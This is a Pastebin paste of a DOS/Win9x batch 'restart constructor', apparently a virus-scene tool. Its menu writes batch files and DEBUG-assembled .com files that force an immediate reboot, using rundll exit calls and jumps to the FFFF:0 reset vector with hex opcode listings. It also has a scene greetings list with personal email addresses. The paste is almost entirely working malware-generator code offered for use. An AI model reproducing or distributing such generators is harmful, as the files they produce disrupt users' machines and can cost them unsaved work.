Advertisement
FlyFar

Constructor.BAT.Restart.20 - Source Code

Jun 26th, 2023
1,120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 3.63 KB | Cybersecurity | 0 0
  1. @echo off
  2. :menu
  3. echo.
  4. echo.
  5. echo                    ����     RC2 - Created by DVL    ��ͻ
  6. echo                    � Win9x and Dos Restart Constructor �
  7. echo                    ����    dvl2003ro@yahoo.co.uk    ��ͼ
  8. echo.
  9. echo      It will easily create .bat files with restart and similar commands
  10. echo.
  11. echo                    �����������������������������������ͻ
  12. echo                    � Viruses don't harm, ignorance does!
  13. echo                    �����������������������������������ͼ
  14. echo.
  15. echo    Make a file (press a number from 1 to 6)
  16. echo    ����������������������������������������
  17. echo.
  18. echo    1 - Restart 1 (min.req. win95 + ie4.01)
  19. echo    2 - Restart 2   (min.req. msdos 6.0)
  20. echo    3 - Restart 3   (min.req. msdos 6.0)
  21. echo    4 - Restart 4 (min.req. win95 + ie4.01)
  22. echo    5 - Restart 5   (min.req. msdos 6.0)
  23. echo    6 - Restart 6   (min.req. msdos 6.0)
  24. echo.
  25. echo    7 - Greetz and special thanx
  26. echo    Q - Quit (Are u sure ???)
  27. echo.
  28. choice /c:1234567Q>nul
  29. if errorlevel 8 goto done
  30. if errorlevel 7 goto 7
  31. if errorlevel 6 goto 6
  32. if errorlevel 5 goto 5
  33. if errorlevel 4 goto 4
  34. if errorlevel 3 goto 3
  35. if errorlevel 2 goto 2
  36. if errorlevel 1 goto 1
  37. echo CHOICE missing
  38. goto done
  39. :1
  40. @echo %windir%\rundll32.EXE %windir%\system\shell32.dll,SHExitWindowsEx 7 > restart1.bat
  41. goto done
  42. :2
  43. @echo"ECHO G=FFFF:0 | C:\WINDOWS\COMMAND\DEBUG.EXE >NUL" >restart2.bat
  44. goto done
  45. :3
  46. @echo e 0100  B8 40 00 50 1F C7 06 72 00 34 12 B8 FF FF 50 B8>>v
  47. @echo e 0110  00 00 50 CB 00>>v
  48. @echo rcx>>v
  49. @echo 14>>v
  50. @echo n com>>v
  51. @echo w>>v
  52. @echo q>>v
  53. @debug<v
  54. @ren com restart3.com
  55. @deltree/y com >nul
  56. @deltree/y v >nul
  57. goto done
  58. :4
  59. @echo %windir%\rundll user.exe,exitwindowsexec > restart4.bat
  60. goto done
  61. :5
  62. @echo e 0100  B8 40 00 8E D8 B8 7F 7F A3 72 00 EA 00 00 FF FF>>cb
  63. @echo e 0110  28 63 29 20 31 39 38 38 20 5A 69 66 66 20 43 6F>>cb
  64. @echo e 0120  6D 6D 75 6E 69 63 61 74 69 6F 6E 73 20 43 6F 2E>>cb
  65. @echo e 0130  20 2D 20 62 79 20 43 68 61 72 6C 65 73 20 50 65>>cb
  66. @echo e 0140  74 7A 6F 6C 64 00>>cb
  67. @echo rcx>>cb
  68. @echo 45>>cb
  69. @echo n com>>cb
  70. @echo w>>cb
  71. @echo q>>cb
  72. @debug<cb
  73. @ren com restart5.com
  74. @deltree/y com >nul
  75. @deltree/y cb >nul
  76. goto done
  77. :6
  78. @echo e 0100  B8 40 00 8E D8 B8 34 12 A3 72 00 EA 00 00 FF FF>>wb
  79. @echo e 0110  28 63 29 20 31 39 38 38 20 5A 69 66 66 20 43 6F>>wb
  80. @echo e 0120  6D 6D 75 6E 69 63 61 74 69 6F 6E 73 20 43 6F 2E>>wb
  81. @echo e 0130  20 2D 20 62 79 20 43 68 61 72 6C 65 73 20 50 65>>wb
  82. @echo e 0140  74 7A 6F 6C 64 00>>wb
  83. @echo rcx>>wb
  84. @echo 45>>wb
  85. @echo n com>>wb
  86. @echo w>>wb
  87. @echo q>>wb
  88. @debug<wb
  89. @ren com restart6.com
  90. @deltree/y com >nul
  91. @deltree/y wb >nul
  92. goto done
  93. :7
  94. cls
  95. @echo.
  96. @echo.
  97. @echo   Greetz and special 10x goes to:
  98. @echo   �������������������������������
  99. @echo   - NGL - myth_eu@yahoo.com
  100. @echo   - SpTh - SPTH@aonmail.at
  101. @echo   - Sad1c - sad1c@interfree.it
  102. @echo   - Adder - adder_2003@yahoo.com
  103. @echo   - Nino - drliks@yahoo.com
  104. @echo   - Mj (Gotenks) - igrasie@yahoo.com
  105. @echo   - Ratty - ratty2001ro@yahoo.com
  106. @echo   - John - Cyberpunk_ro@yahoo.com
  107. @echo   - Kaspersky - www.kaspersky.com
  108. @echo.
  109. @echo.
  110. @echo   Contact me at: dvl2003ro@yahoo.co.uk
  111. @echo                   ���������������������
  112. @echo.
  113. @echo.
  114. @echo   Press any key to the main menu ...
  115. @pause >nul
  116. cls
  117. goto menu
  118. :done
  119. cls
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement